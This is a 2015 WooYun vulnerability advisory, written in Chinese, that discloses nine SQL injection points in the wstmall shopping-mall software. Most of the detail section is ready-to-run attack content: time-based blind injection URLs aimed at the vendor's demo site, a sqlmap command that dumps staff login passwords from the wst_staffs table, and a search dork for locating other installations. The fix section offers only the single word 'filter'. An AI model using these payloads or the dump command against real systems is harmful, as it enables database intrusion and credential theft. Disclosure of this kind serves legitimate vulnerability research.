当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135248

漏洞标题:wstmall商城系统sql注入(9处打包demo演示)

相关厂商:wstmall

漏洞作者: 不能忍

提交时间:2015-08-19 17:51

修复时间:2015-10-03 17:52

公开时间:2015-10-03 17:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

tp框架,php5.3版本,无视gpc,有些是盲注有些不是。全部没过滤

详细说明:

案例:百度一下:powered by wstmall
我就不贴代码了,厂商自己找把,都很简单。
http://demo.wstmall.com/index.php/home/goods_cats/querybylist/?id=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/home/areas/getAreaAndCommunitysByList/?areaId=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/Home/orders/orderCancel/?orderId=1 AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/Home/orders/checkOrderPay/?orderIds=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
http://demo.wstmall.com/index.php/Home/orders/orderConfirm/?orderId=1 AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'--
http://demo.wstmall.com/index.php/home/payments/getAlipayURL/?orderIds=1000000013&payCode=1%27) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
//要求orderIds=1000000013时orderStatus必须大于0
上面这些都是盲注,请在demo站注册之后提交。下面这几处请在sqlmap下测试,不是盲注,但是回显不在网页上,回显数据是json要用抓包工具才能看到(这里表示sqlmap强大。。),由于数据包比较复杂我这里就不抓包演示了,sqlmap把!
http://demo.wstmall.com/index.php/Home/payment/topay/?orderIds=1*
http://demo.wstmall.com/index.php/Home/payments/topay/?orderIds=1*
http://demo.wstmall.com/index.php/Home/orders/getorderinfo/?orderId=1*
./sqlmap.py -u "http://demo.wstmall.com/index.php/Home/payment/topay/?orderIds=1*" --cookie="注入的时候记得把登录的cookie传过来,不然没法注入" --threads 10 --batch -D wstmall -T wst_staffs -C loginpwd,staffname --dump

漏洞证明:

这里只演示一处sql盲注了,其他请到demo站注册个帐号演示,都很简单的。

1.jpg


修复方案:

过滤

版权声明:转载请注明来源 不能忍@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝